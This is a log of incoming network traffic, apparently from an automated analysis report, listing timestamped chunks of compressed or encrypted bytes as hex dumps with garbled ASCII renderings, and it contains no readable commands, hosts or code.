2022-05-30 12:45:59 UTC	802	IN	Data Raw: 9c 53 76 11 26 57 36 d2 5a 50 39 2e cf 40 6b 12 3a ab f6 37 4c 1e a4 fe fc 69 4f 88 2e 50 b2 25 cf 4d b3 d3 94 8c ae 69 b9 19 6b 9f 9c e5 46 4e 18 21 ff f8 77 08 80 3a 24 15 21 77 bd 97 cb 15 00 b1 07 c6 87 36 e2 d8 57 72 fc 30 91 c7 bb fa c3 48 02 66 56 2f 43 b2 b5 bf f1 24 d2 43 0c 02 ad 18 c3 28 d8 f6 16 65 7c 27 26 79 8a 05 66 0b e1 39 c2 01 6e c2 b1 cd fd 2d a1 0a 67 9c 8d a5 27 10 9a 3b 15 cd 10 7d bd f3 c7 9c 3d 05 a1 4e f1 66 aa f5 cb 36 cb 1b 88 67 58 c0 b8 b4 9e 96 93 eb d4 37 aa 64 42 dd eb 88 b1 72 47 c2 0b 48 db 94 0f 78 70 71 f8 39 3c 00 89 ce 91 bb bf 58 d8 fb 61 4f ef fa e0 d8 11 7a 65 1b cc a4 f8 6f a2 b9 a4 8a 22 97 76 aa fe 1d dc 5a 61 6c 00 34 43 5c ab ba 77 b2 98 eb a6 fe 39 52 82 9e d5 72 82 4a 84 84 94 6c 53 79 dc ae 94 f6 01 59 9a Data Ascii: Sv&W6ZP9.@k:7LiO.P%MikFN!w:$!w6Wr0HfV/C$C(e\|'&yf9n-g';}=Nf6gX7dBrGHxpq9<XaOzeo"vZal4C\w9RrJlSyY
2022-05-30 12:45:59 UTC	804	IN	Data Raw: 50 95 1c 42 be 10 fe ff fc e8 92 73 e2 d5 a4 38 1d a5 73 69 32 b3 e9 fc fe 23 97 44 8c e3 9e 65 62 de 69 ba 62 81 e7 96 3a 49 93 7c 9a fc 69 a9 84 7e 74 f4 b4 3c 01 1a 47 2e 0d f8 46 15 6b 2f 8a d3 e4 df 95 6a 3d 6b e8 b6 df b2 46 33 eb 00 c8 7e 97 21 ab 4a 66 b2 ce 5b 35 3b 91 c5 c3 28 ec af 29 c8 b0 a7 d7 d4 21 cd 72 a3 49 d1 00 45 69 15 a3 08 93 0c 8d f9 e2 c6 ea c0 a7 86 71 18 bc de 47 22 cf 1b 7f 91 cf 8b d2 ab 1f 13 14 8c e5 9a 72 73 65 b5 ef e9 26 c6 00 db 3c 54 cb ea a6 b2 12 75 b4 58 32 b8 1a 2d 37 2e 6d 22 b6 c9 34 48 52 91 3a 73 c3 5e 1d df 54 12 db cd b7 e2 ae a4 d4 eb 05 f1 03 43 e0 4d 6f 80 f0 24 a5 eb fe 17 a5 09 18 61 8a 75 0e 35 d2 19 94 f7 ec 78 0c 70 9a 66 15 6a af 9a 05 86 eb 5a c1 eb ad 41 09 59 0f a6 78 c3 a3 ce ad 37 9b 1b b7 c8 b0 Data Ascii: PBs8si2#Debib:I\|i~t<G.Fk/j=kF3~!Jf[5;()!rIEiqG"rse&<TuX2-7.m"4HR:s^TCMo$au5xpfjZAYx7
2022-05-30 12:45:59 UTC	805	IN	Data Raw: f3 36 71 38 e9 c8 87 38 1b b3 b8 bf b0 a3 16 82 8e 61 8c 89 9b 6b 2c e3 db a5 29 dd fa 6e 60 f8 8b 82 27 ab 40 58 8e d2 cb 21 70 ed 2d 62 e3 32 fd 80 41 d6 2b bd 0f ed da d8 10 ba 05 6f c2 c2 52 0f 03 e0 e0 6a 17 96 1c 4a f9 4f 96 08 13 17 3a 5a a1 31 43 4a 6f 33 ee 77 66 c1 b7 19 78 dc 79 9f a9 ef 84 ee 45 98 9a 9e 12 77 9b 9e 23 98 74 42 f9 d8 7d 03 fb 0c e3 ab ca fa 24 59 6b 32 55 40 1f a6 3a b4 f2 82 e3 64 b3 ef 48 dd 58 9f 32 8f 57 ee 69 cf f7 69 33 71 7b a3 8d d3 92 a8 4a a5 6b da 47 67 9a 79 6f 17 4b d6 64 d8 d7 77 c5 e0 30 aa 26 5f 0e 2a cb ea b0 85 3c 7f 5d b5 85 8f be 50 8c 27 4a f2 d3 19 3f 8d ed f3 0a 4d c1 17 54 f4 95 7b 27 58 27 73 c4 82 06 c9 62 87 6f 8d 6b 48 ec c4 ef b5 ff 2c 2c 62 8b ef 49 d2 fe 77 89 a9 3f 9c b8 d5 7f 3e 5c 98 73 a3 74 Data Ascii: 6q88ak,)n`'@X!p-b2A+oRjJO:Z1CJo3wfxyEw#tB}$Yk2U@:dHX2Wii3q{JkGgyoKdw0&_*<]P'J?MT{'X'sbokH,,bIw?>\st
2022-05-30 12:45:59 UTC	806	IN	Data Raw: cd 0c f7 a8 fa 0e bc 16 72 de 0a 31 71 c7 cd 02 c8 1f 07 2b b0 b2 83 cf bd ee d8 f3 93 34 e8 5f 0c c0 6e e6 b2 fa 7c a9 fe 4b 9b 6f a0 15 66 ad 8e 5e 2f ba 60 e0 25 e3 4c ee ae 8a 95 31 a0 c1 23 4e 20 fa 08 4b f8 3c 8f b6 8f 2d f6 14 a1 a9 13 4e 50 f7 86 e1 44 ab 86 41 d0 71 20 94 eb 82 06 d1 5c 1d 88 06 20 f7 14 b7 ff 53 5a 9b d2 84 e6 94 20 b7 5d cd 1f 4f 23 db f6 c8 c6 cd a8 1c 9c e1 a2 1e b1 9a 2c a0 7d c3 0f e0 07 a2 6e c5 0b c3 68 76 2e 70 9e 35 5b 8a 97 a4 18 82 28 dc be 21 b3 ec 81 a4 ff c2 25 d4 1d 3e b9 7f c0 35 74 f2 63 80 ca fd db 2a b0 c0 6b cf ee 9c ff 46 98 16 51 c9 f5 80 10 54 88 95 6b 44 74 52 e0 37 fe 79 32 09 f4 7f 6a ce 6a c1 3a 18 9f e8 fd 0f 48 96 57 ad 72 ea e5 8c 2c d4 e1 3c 6a ed 99 26 e8 b3 a4 b4 6a 31 2e 27 7b 53 97 24 ce 04 b8 Data Ascii: r1q+4_n\|Kof^/`%L1#N K<-NPDAq \ SZ ]O#,}nhv.p5[(!%>5tc*kFQTkDtR7y2jj:HWr,<j&j1.'{S$
2022-05-30 12:45:59 UTC	807	IN	Data Raw: 88 14 66 8d 59 ea 8c 55 15 fe 37 e6 4e 06 71 a6 09 47 c1 33 ba 74 f7 2a 3e e9 35 c3 28 98 f2 b7 0a b1 93 d4 56 4d 94 84 61 ce 61 07 43 60 69 01 41 de 70 a3 7a 2b 82 1c 52 df f2 72 db 75 34 e3 1f 10 90 ff d6 0e 0f 44 61 25 94 54 a8 af b0 4e 42 8e f0 51 9d e9 02 35 25 c0 ab 34 8a f5 b5 b4 fc b1 58 32 cc 12 f5 a1 70 37 a9 53 7f f9 34 d5 7d b5 73 f0 e3 9a 66 98 12 d9 0d b8 fd ae 72 d6 a3 71 c1 60 68 2e e4 99 4c c6 2c 54 34 76 5a 55 19 ca 9a 48 65 7a 34 ca b0 08 a4 13 9e d2 7a 52 5c 1b a2 17 55 d3 c4 0f 27 46 e1 60 0f d0 90 1f 36 83 ca a3 c9 1d 3e e6 8e 82 80 8f 62 e5 b8 e4 65 03 0c 01 56 eb db 3f a7 47 a7 84 7f 6d b8 ea fb 9b f4 d7 68 06 46 f4 6e c9 cb ce f6 b3 e3 a8 9b a8 bb 21 b3 73 e2 ba 6a 98 c6 cc 82 49 b2 24 97 14 bd be 2a 87 42 15 3a f3 25 c8 a4 87 f2 Data Ascii: fYU7NqG3t>5(VMaaC`iApz+Rru4Da%TNBQ5%4X2p7S4}sfrq`h.L,T4vZUHez4zR\U'F`6>beV?GmhFn!sjI$B:%
2022-05-30 12:45:59 UTC	809	IN	Data Raw: 0c 68 e4 78 35 c7 b1 0d 88 62 0c bd c3 61 4e 22 de c3 be 43 ea 87 5c 34 f1 b7 fe 32 27 a2 06 55 8c 23 88 4d 34 c1 07 f5 89 93 00 62 fa 89 62 ed 2f 2f 7f 39 1b 72 98 72 23 0c 4f f0 07 01 6b a9 33 dd 7c b5 0a 0b ac 5a a3 fb 11 94 6e e7 1b bb b9 9f fd 22 e8 51 17 f1 a8 2b 48 11 48 35 48 95 2a 4f 9d f1 eb 32 6e c5 fd f0 3e df 7c 96 6a 33 19 e8 89 e9 b8 7e 15 40 7b ea c6 52 b5 06 4b 91 5c 82 bb 91 25 db bf a8 41 c0 52 9e fb f2 55 2f 57 cc 59 0c 20 90 94 f7 d2 b2 ad 19 56 7c 83 8b 99 b1 a2 49 62 36 ff 9b 19 68 87 4a 15 7b 3e f3 ad 36 f3 a9 e3 25 08 cf 4e b3 3a 54 c8 3d a6 14 fa 10 1b bf 43 b5 a4 ca d4 03 5f 92 1c b6 5e f3 cb 9d f9 50 f3 2d 80 c1 40 75 fb 42 69 0d eb 9d db fd cb 87 e2 ac cb 80 24 26 ab a0 65 8b 10 d1 77 1f a9 0a 77 7f b7 63 c6 35 6d 48 c1 33 ba Data Ascii: hx5baN"C\42'U#M4bb//9rr#Ok3\|Zn"Q+HH5H*O2n>\|j3~@{RK\%ARU/WY V\|Ib6hJ{>6%N:T=C_^P-@uBi$&ewwc5mH3
2022-05-30 12:45:59 UTC	810	IN	Data Raw: 07 2f 6e 6d 70 b2 f0 e9 44 ad fa 1d d4 41 eb 39 a4 04 67 2d cb a0 e3 df 27 24 b0 8d 8d 13 0a 57 db e7 71 86 fc b2 cc dd 51 1a 9e 94 84 68 2b 8a b8 c4 a4 4c a6 80 db 2c a8 5e 3d 0b 1c 61 fe ef a0 ac d3 75 02 14 e3 e5 0f e3 2f c8 fc 75 cb 2c 84 d1 8f 96 23 55 5c ae ab 10 a8 e9 12 d0 80 41 e3 d9 21 db 2c 5d 92 1d b8 a1 f9 d0 10 d2 5d 9e 9b 16 f6 fb ca ac f3 dd 87 e2 49 ef 87 de 16 a3 c6 2f 75 08 20 8a 44 ff 44 04 9e 33 bf 1c 5d 54 06 dc a7 87 3e 4d 83 d3 ef d6 c2 51 0f 46 9e c3 ad 01 f0 42 6a 6b ec 88 6a 4f e0 d2 65 ae 41 59 e3 37 27 58 53 15 7e f5 2f d0 c5 1d 2b 85 74 1e 6f df 22 50 c5 67 a8 8b fb 9e 54 f0 78 6d 59 ed 71 9d d5 94 9d 39 69 55 9b e3 ad 77 b9 74 05 dd 0f 33 44 f5 53 a8 45 14 0f 69 8b cb 9b 46 72 78 c6 34 0b 5b 71 15 69 ba e2 39 84 85 55 86 40 Data Ascii: /nmpDA9g-'$WqQh+L,^=au/u,#U\A!,]]I/u DD3]T>MQFBjkjOeAY7'XS~/+to"PgTxmYq9iUwt3DSEiFrx4[qi9U@
2022-05-30 12:45:59 UTC	811	IN	Data Raw: 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 18 67 b3 39 d3 67 f4 fd 17 a5 89 eb 91 48 87 d2 32 93 23 fe f9 98 c7 27 bf 9e 3c 7f 68 db 0f 2e 49 e3 2c ab ef d9 2c 22 96 1f 0c 12 c4 d7 87 86 f8 bb 77 a1 ce b3 45 85 8d 24 e8 92 5a 44 aa 4c a8 33 fb eb a0 84 b1 ac 87 bb 55 33 66 17 97 62 8c 38 30 a2 01 02 be d8 29 64 27 c3 71 ed 23 82 6f fe 04 2b cb Data Ascii: \|nXQ^s.G?TEuX2.l"":>s*^io`kg9gH2#'<h.I,,"wE$ZDL3U3fb80)d'q#o+
2022-05-30 12:45:59 UTC	811	IN	Data Raw: 0c cd c6 3f 68 9b a3 30 fa 18 2c 77 c7 cb a5 a8 10 d9 65 d0 bd 71 a9 dd e1 7f 80 a1 52 23 3c c7 c0 b8 4f 9c f7 8c 0b be 4b fd 60 88 00 7a 0f ce 5e 1f 13 4e fd ad 41 0c ee f4 23 bb 14 e0 63 63 4e 66 53 26 7e 6c 9e cf b6 ef 84 a4 d5 ab 00 43 8d 36 f8 de 01 12 3b 45 85 92 cb d6 93 b5 1d 66 de 18 22 ee 0f 18 68 74 b8 59 74 0c 9e 34 1b 86 9b c6 d8 3d c2 87 16 43 d4 7b a3 a6 c2 16 71 68 ee 08 7f d1 95 7d c4 1d cc 33 a0 67 ad 10 a3 8c 22 a3 d9 28 70 59 7c 5c 0b 3a f9 19 82 4a 73 3f 9f dd 4c 87 25 92 9c 20 d4 85 9d 75 8d 63 bf 83 94 ae 34 3a 3c ea 80 b5 01 0c 7f e8 9c 11 5c 9e 16 af 69 70 78 04 fa ca 44 29 ea 5a 5f c8 93 be 79 1e a7 da a7 52 60 44 d4 6a bc df e8 1f a1 17 5e a3 03 2d 31 23 22 72 1e 2d 92 44 f8 15 82 a8 b3 86 1a 35 ea aa 89 55 7e f5 81 8e 04 dc 31 Data Ascii: ?h0,weqR#<OK`z^NA#ccNfS&~lC6;Ef"htYt4=C{qh}3g"(pY\|\:Js?L% uc4:<\ipxD)Z_yR`Dj^-1#"r-D5U~1
2022-05-30 12:45:59 UTC	813	IN	Data Raw: b5 9c 2e 5f ea b1 04 ad cd d6 a2 83 43 bb d6 ea 47 91 27 fa fd fa d6 b9 ac 4c d7 68 98 f2 df 0a b1 d3 d4 be 31 bb 89 22 4d 76 0e 85 a0 09 5d 89 9b 86 ad 39 2b 14 8c 41 b7 97 38 df 75 14 3b a4 ef db 60 57 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e b8 cb 9f 3f f7 ea 44 b8 eb 41 36 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a d4 90 f4 3e 01 c3 44 1b 3b 9d 7e d9 fe b7 5b 6f d7 17 04 fa c8 88 c3 6b 18 67 b3 39 9a 09 9d 89 7e c4 11 2a ed 2d 26 15 5a f7 86 22 96 f7 15 d9 d8 ec f9 b6 0c b7 fc 86 1c 8f c9 66 99 9a 2d e4 f4 76 24 d3 ad b9 9b 4f 8c d2 2c 6b a4 d6 22 7e 8b 24 e4 3a 0b 25 3d 8e ef 5f 71 0f c9 ea 1b 62 f5 d2 8c fa 36 76 47 ac eb 5a ce 60 07 02 3a 7f 63 18 11 64 7b e0 3c 25 fd 82 08 8c 79 b4 b7 61 9f d0 f3 04 ea 86 48 8b c3 d6 8e 02 08 a8 6f c3 b4 dc Data Ascii: ._CG'Lh1"Mv]9+A8u;`WnXQ^s.?DA6X2.l"":>D;~[okg9~*-&Z"f-v$O,k"~$:%=_qb6vGZ`:cd{<%yaHo
2022-05-30 12:45:59 UTC	814	IN	Data Raw: 9c 0a da a5 54 6e 17 79 c0 63 44 97 45 2a d3 63 b7 3a 0c 5c f7 58 d1 92 e7 5f 80 ad 2d 89 45 7d 8f ed a2 60 e5 61 13 32 f7 cb 19 1f b1 3f d9 be 84 ec a3 c4 7e 94 b9 8e 35 06 e8 de 5d 3d d4 89 71 c5 0b a5 a2 40 f2 0a 56 b9 34 cd d1 fb 77 99 73 b5 42 31 37 78 93 c4 dc c7 11 48 35 b1 8d 51 57 9f 8c 3e 02 42 3b 51 50 aa b6 1e 2a 6d 5e 1b 57 5b 92 ba dc 35 2e 0a 50 16 33 b5 06 39 d7 e0 74 1f 1a d6 54 e1 25 52 7d c7 b1 e6 9c 5d 47 dd 1e 4c 77 35 35 97 d8 c8 16 bf 36 f3 d3 c3 2c 9a cc b6 27 d7 93 b9 53 16 d5 35 3d a0 9b 96 91 c8 92 19 0c 79 c9 ba ab a5 63 1d 57 bf 9e 5f 51 4b ad 9f ac e1 eb 16 90 1c 4a 08 30 2a dc 87 12 a7 2f 08 99 fc 69 36 f1 e6 96 99 95 52 78 4e 29 c6 a8 9d 34 35 04 b4 e5 4a 06 b6 db 4a 4e 66 99 c9 75 80 cd f2 b6 b7 2c ee e2 c7 26 af 4a 9a 9b Data Ascii: TnycDEc:\X_-E}`a2?~5]=q@V4wsB17xH5QW>B;QPm^W[5.P39tT%R}]GLw556,'S5=ycW_QKJ0*/i6RxN)45JJNfu,&J
2022-05-30 12:45:59 UTC	815	IN	Data Raw: 20 46 31 7d c9 a5 e9 22 a2 81 8e e3 45 8f 36 f8 de 65 6b e1 43 86 d0 54 d0 13 a2 c7 60 ca 74 bd e8 9f 2f b2 72 38 d7 eb 0a 3e dd c1 80 e6 74 47 3b 72 0a cc 45 aa af 3c a0 02 bd ab 6e e2 fa e0 d7 45 3c 21 1b 4d 27 00 61 49 7f 46 8a 4b 97 79 2e 84 54 99 5a 7b 6e 59 1f 8a 62 96 39 9e b3 ec 81 05 5c 79 26 56 1d 3d 73 b5 85 5a 85 18 6c 94 3c 6c 70 65 b3 84 d2 df ee f4 b5 b9 98 1b 51 c9 76 0c 5a 1e cc c2 0d 4b 5c d7 ba 77 b8 fe 54 06 dc 3f 46 84 42 ca 1a 1d d9 58 d1 45 11 7a 31 a2 2b f9 c9 c6 74 15 87 33 42 10 e3 66 ae 91 56 bb 33 e2 03 6d 53 01 07 20 88 18 95 d6 a5 7b 58 6f 36 b9 38 7e 98 9b f3 7d d8 10 52 98 4e 2d 12 c9 99 06 99 d8 d0 e5 76 65 1c 75 ac 7b 32 1d 34 9e 10 3a 41 ae 40 dd 52 0f 80 98 a3 20 b9 b8 38 4e 72 af f9 49 36 13 45 5a a1 c8 88 10 6f bb 9b Data Ascii: F1}"E6ekCT`t/r8>tG;rE<nE<!M'aIFKy.TZ{nYb9\y&V=sZl<lpeQvZK\wT?FBXEz1+t3BfV3mS {Xo68~}RN-veu{24:A@R 8NrI6EZo
2022-05-30 12:45:59 UTC	817	IN	Data Raw: 77 68 fe d4 67 70 7c 71 ff 1d 37 23 fb 2b 1e d3 f9 5c 47 c9 db 7c 26 ae 60 cc 20 83 0c d1 3a 5d a0 7b cf b2 47 02 49 e1 22 7d da e4 d2 4b 01 b1 4f 75 2a cd 73 ba a6 d6 0e 0a b0 73 60 bd c1 fc fb 02 7b 0c f0 56 a6 09 80 cb 23 a5 7d 04 f2 3c 23 13 58 f6 a6 38 99 f7 09 e2 d8 ea f9 b8 00 99 e0 ce 2e 8d c8 6f 8c 9c 3a 8a 90 1f 50 e9 a7 a3 8b 47 92 de 04 67 ae dc 13 40 ea 50 8d 55 32 06 2f a3 cf 5d 79 20 c3 84 7f 4c e4 cf b0 ed 13 63 50 a8 de 51 cf 60 57 70 5f 1c 46 17 32 25 04 ab 16 49 0c aa 27 e1 a8 0c f7 36 58 03 d6 47 59 94 6a e2 05 ae a2 6c f8 71 5d aa b7 df fb 6a db e1 ab 6f c9 3b 93 f3 a0 ac 61 93 ff a4 7e fa f4 24 9e 0b 88 00 06 e8 ab 2f 3c dc 3a 98 b6 b5 5d a2 a7 e6 d6 51 a8 a6 09 3b 35 9c 56 1b 78 6c bb cf a8 41 d3 a0 ae d4 20 de 64 af 92 6e 41 cf 06 Data Ascii: whgp\|q7#+\G\|&` :]{GI"}KOu*ss`{V#}<#X8.o:PGg@PU2/]y LcPQ`Wp_F2%I'6XGYjlq]jo;a~$/<:]Q;5VxlA dnA
2022-05-30 12:45:59 UTC	818	IN	Data Raw: c6 a7 08 d3 6f 2f d9 58 a2 de f8 12 ee 05 c4 2e 55 6f 7f b5 a7 b3 b1 11 48 b1 ab ad 22 23 ee fe 5d f7 0a 0b 3f 2d d8 d7 77 da 64 79 77 2f 7f e6 c8 0d 7d 0a 6d 2f 7b 5d b5 b2 23 f7 93 1e 77 6e f6 fb fc 14 72 32 a5 91 94 31 5b 65 b8 3f 3b 03 54 99 9a bd a6 5b cf 16 81 52 c8 06 ec 8a c0 46 b5 0f b4 16 16 f1 42 49 d2 02 9f b9 e8 c3 74 61 1c ae a6 9a a5 45 6d 32 c7 fe 16 72 22 e6 fe 8c 83 be 0c ac 1c 63 78 59 47 95 8a 77 c8 70 78 99 fc 51 2b db 89 9d f0 f4 3c 45 07 0a af e8 fc 47 15 3b ad c5 24 0b db b5 6a 55 76 af bd 3f e9 cd f2 c2 aa 06 81 f0 ae 47 c1 b3 d3 b8 92 f6 fd ac c9 4f 41 dd f2 ea 0e b1 d3 4c d7 74 94 b2 65 4d a5 a7 af e5 1d 62 ce 9b 78 3e 13 6e c2 24 06 b7 f2 ce f2 30 dc 88 e4 ef 6f b4 7b 43 8a be 11 1f 1f c0 e5 2b 58 6a b1 5e 73 51 f5 6b 47 f7 df Data Ascii: o/X.UoH"#]?-wdyw/}m/{]#wnr21[e?;T[RFBItaEm2r"cxYGwpxQ+<EG;$jUv?GOALteMbx>n$0o{C+Xj^sQkG
2022-05-30 12:45:59 UTC	819	IN	Data Raw: 64 70 cc 27 00 09 cb 73 03 ab 22 97 79 ba 00 58 dc 39 0b 6e 59 7f e7 6d d3 38 9f b3 ec 21 55 53 3c 62 d4 1d 3d df fd 8a 1f f8 94 6c 94 84 4c 7f 20 04 01 d2 df 86 f9 ba fc 9a 16 51 c9 a6 08 55 5b 89 44 0d 4b dc 3a b5 32 bc 79 54 06 00 d7 49 c1 05 d4 1a 1d 31 98 de 00 96 5e 31 a2 a3 54 c6 83 71 1e 87 33 b6 88 ec 23 e6 b3 56 bb a3 8f 0d 28 55 7e 07 20 88 75 9b 93 07 f2 58 6f 3a fc 36 3b 09 10 f3 7d c0 25 5c dd 07 a7 12 c9 bd 23 97 9d 63 f2 76 65 2c 64 a2 3e 99 05 34 9e 78 dd 4f eb 01 c2 52 0f bc 7d ad 65 32 ca 38 4e ea 6e f7 0c 31 97 45 5a ed 7d 86 55 25 33 9b 78 1f 98 d6 7f fb d8 5d f9 72 7e be 88 65 60 e5 13 12 22 d6 eb bb 71 dd 46 89 a9 a8 80 6a e4 0d ed b6 8b 15 6b 21 de 5d 4f 39 8b 5b b0 eb c6 c7 60 02 1e 72 dd e2 a2 b2 90 f7 9f 59 c0 eb 55 17 17 5c d6 Data Ascii: dp's"yX9nYm8!US<b=lL QU[DK:2yTI1^1Tq3#V(U~ uXo:6;}%\#cve,d>4xOR}e28Nn1EZ}U%3x]r~e`"qFjk!]O9[`rYU\
2022-05-30 12:45:59 UTC	820	IN	Data Raw: 67 a9 39 d3 67 ec 8b 52 a5 21 43 97 48 f5 15 71 93 0c 56 ff 98 5f f9 fc 9e 52 d7 6e db a5 f0 0a e3 11 03 e9 d9 16 fc d5 1f f6 ba c2 d7 a1 58 bb bb d4 09 c8 b3 59 4b ce 24 ff 3a 5c 44 d2 9d eb 33 87 4c a6 84 ef 7d c4 bb be 94 60 17 cd a3 cf 38 91 05 07 02 a6 09 6a 64 2d 64 77 ed 1f 42 2c fe 0e 8c cd 0c 5f 17 7c 68 39 04 36 fa 2e ec 34 c7 f5 02 ae 10 97 b5 93 bd 17 0f db e1 83 41 e2 52 de 9a c1 c0 cc 9f df f7 ad ad b8 4b bd 06 cd 00 1a a9 c8 5e 99 c3 0d fd bb e7 0a ee 14 f3 f8 14 be c5 65 4e 0e 93 65 7e 65 38 c9 b6 01 54 e7 d5 98 a6 45 8d 3e 9f 9b 01 17 a4 43 85 24 22 95 93 97 82 60 de 14 db ad 0f 46 f7 72 b8 d7 9c 4f 9e f6 84 80 9b 24 21 7e c2 5d 89 45 d4 a3 4b e5 c2 94 ee 6e ee fa 87 92 95 41 64 1b cc 3f 77 24 ad a8 03 8a 22 a7 0e 6b 70 66 dc 5a 0b f6 3f Data Ascii: g9gR!CHqV_RnXYK$:\D3L}`8jd-dwB,_\|h96.4ARK^eNe~e8TE>C$"`FrO$!~]EKnAd?w$"kpfZ?
2022-05-30 12:45:59 UTC	822	IN	Data Raw: 51 24 12 a1 91 f8 fd 47 20 95 1e 73 03 00 41 f2 f8 c0 79 aa 16 ac b6 e9 43 be a9 c4 46 c3 ff b5 53 3b d5 10 49 9c fe f7 fc 80 e6 09 61 31 a6 8e df e8 63 69 32 a6 ea 05 37 0f c1 bb 8c d9 9e 48 e9 50 4a 1d 59 33 b9 8d 32 c8 5a 7c 99 99 69 37 9e a4 b6 b1 f4 6f 01 6e 4f c2 c4 93 47 38 6b 89 80 6f 26 df b5 1e 3d 71 ea 90 10 b7 cd b3 b6 c3 43 f9 c2 c2 47 ec 33 e0 fd d3 c2 f9 ac b3 c3 5d 98 df df 50 b1 92 d4 be 31 f5 84 07 4d 88 03 9c a0 5c 55 ca 9b 13 8e 1b 2b ef 1c 45 b7 b7 72 9b 75 ba b1 8f ef 42 7c 54 06 c5 84 15 1f 77 14 e5 6e 75 51 fc 5e 3d b1 9c 2e 2a c9 af 3f 79 cb 4c b8 11 d0 75 bc 2b 32 a9 12 81 fe 60 6c 6d b6 22 3a d2 90 e2 3e 5e c3 67 1b 07 9d 12 d9 a6 b7 02 6f d4 17 2b fa fe 88 af 6b 73 67 ca 39 fe 67 bf fd 50 a5 7d 43 e4 48 12 7a 19 93 a4 56 ba 98 Data Ascii: Q$G sAyCFS;Ia1ci27HPJY32Z\|i7onOG8ko&=qCG3]P1M\U+EruB\|TwnuQ^=.*?yLu+2`lm":>^go+ksg9gP}CHzV
2022-05-30 12:45:59 UTC	823	IN	Data Raw: 0d 38 5c 32 f0 41 b8 54 54 40 dc ee 0c c1 42 d4 1a 7c d9 9a 9b 2d 11 07 31 e7 2b 31 83 e6 74 70 87 1e 42 bb a9 61 ae b3 56 de 33 99 48 05 53 3d 07 6f 88 04 de e0 a5 9f 58 01 36 a0 73 7d 98 59 f3 7d d8 54 19 bc 4e d5 12 e4 99 01 d2 c4 d0 f2 76 00 1c 7b e7 13 32 47 34 c4 10 ba 0a 8e 40 b1 52 22 80 5c e8 20 b9 ca 38 2f 72 79 b2 21 36 dd 45 15 a1 0c c3 30 6f 5d 9b 55 bf a9 93 2b f3 d8 5d 9c 2a 7c fb a5 c6 21 e5 41 76 53 93 8a 76 03 dd 6b f9 94 ed c2 c6 e4 0d 88 ca 94 50 46 e8 84 5d 18 b1 fa 1e d5 79 b5 c7 4d 96 2a 37 9e 58 a2 b2 f1 57 9c 1c ed 2e 1e 17 40 f0 a7 a9 d0 11 26 35 ee e8 72 38 a2 fe 5d 67 07 4e 4c 31 f1 d7 34 46 40 3c 77 32 1a e6 ba a5 38 4f 2c 31 3a 5d b5 06 2e b2 e0 01 5e 6e a3 3b cd 51 72 12 c0 91 e6 fd 1e 20 fa 1e 77 03 54 41 97 f8 d5 79 e6 16 Data Ascii: 8\2ATT@B\|-1+1tpBaV3HS=oX6s}Y}TNv{2G4@R"\ 8/ry!6E0o]U+]\|!AvSvkPF]yM7XW.@&5r8]gNL14F@<w28O,1:].^n;Qr wTAy
2022-05-30 12:45:59 UTC	824	IN	Data Raw: a6 f1 7f 0b 81 dd e3 e6 60 3a 35 a8 8a 5b a2 05 07 65 3a 13 2f 49 57 01 77 9e 7f 25 69 99 4e f9 cd 21 f7 08 39 06 b3 04 36 92 0e ee 71 ea cd 6b ae 7c 2f c3 d6 d5 97 66 db cc ab 4f a7 3c e7 9a c1 a8 08 9b 9a da 2c cf b8 2a fd 60 88 68 06 db c8 73 49 dd 48 8f e5 e7 0a 86 c8 f0 bd 39 d0 ad 65 3b 46 f5 20 16 78 41 c9 9b e9 43 a2 b8 c7 a6 45 e4 36 9c de 2c 22 cd 43 e1 d0 54 d0 fa eb f1 60 f3 74 d4 e8 7c 66 f7 72 d1 d7 9f 0a b3 94 e7 80 f3 74 47 3b ab 43 fd 45 f9 af 55 a0 b6 f4 ee 6e 84 fa 81 d7 b8 75 0e 1b bc 27 00 61 c6 36 62 8a 0f 97 1e 2e 15 1d dc 5a 60 6e 32 1f af 28 b8 39 e5 b3 ec 81 4e 16 52 26 f9 1d 54 73 e3 cf 1f 85 ff 6c fb 3c 11 3a 4b b3 73 d2 df ee f7 ff 93 98 7d 51 e4 76 11 10 35 cc 44 0d 4b 5c 34 f0 4b b8 54 54 6d dc c0 0c c1 42 b8 1a 69 d9 c5 9b Data Ascii: `:5[e:/IWw%iN!96qk\|/fO<,*`hsIH9e;F xACE6,"CT`t\|frtG;CEUnu'a6b.Z`n2(9NR&Tsl<:Ks}Qv5DK\4KTTmBi
2022-05-30 12:45:59 UTC	825	IN	Data Raw: 7c 35 47 88 e3 1f c8 68 7c b4 fc 59 42 9e 89 b6 f4 9f 3c 64 6e 3d af aa f8 22 15 07 c4 b3 24 14 df b5 6a 3d 1f eb bd 10 ed ce f2 b6 c3 42 81 c2 aa 44 c1 33 ba fc 92 c2 f9 af c9 c3 28 99 f2 df 0a b2 d3 d4 be 33 94 84 61 4e a5 03 c6 c3 6e 38 2a 9a 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 76 dc b1 e0 cf 6a ef 0b 06 8a 84 15 1f 1f 14 8c 28 03 12 b5 ce f2 f7 9c 9c 56 8a db 99 ec 8b 01 da 24 b4 55 d9 20 51 a9 62 d8 97 41 02 22 b6 22 ba c5 d5 91 b2 09 86 2a 8f 24 d8 12 79 b7 f2 69 c3 83 52 60 42 de cd af af 62 22 b3 ed a9 22 f4 1d 6d e0 7d ab ed 0d 65 8a 4e d6 ef aa 85 dd 7b 87 c2 db 90 b3 7e 9d 99 92 34 a6 ac 1f 92 9c 42 ae eb 5a 50 92 b9 92 cd 02 85 fe 4d 29 d8 f5 61 1d f0 61 e4 0e 27 01 56 d3 d5 76 1d 70 dd c1 7f 43 fa fe e3 40 75 51 35 89 f1 7d a2 55 7c 47 3a 0f 79 Data Ascii: \|5Gh\|YB<dn="$j=BD3(3aNn8xz+rvj(V$U QbA""$yiR`Bb""m}eN{~4BZPM)aa'VvpC@uQ5}U\|G:y
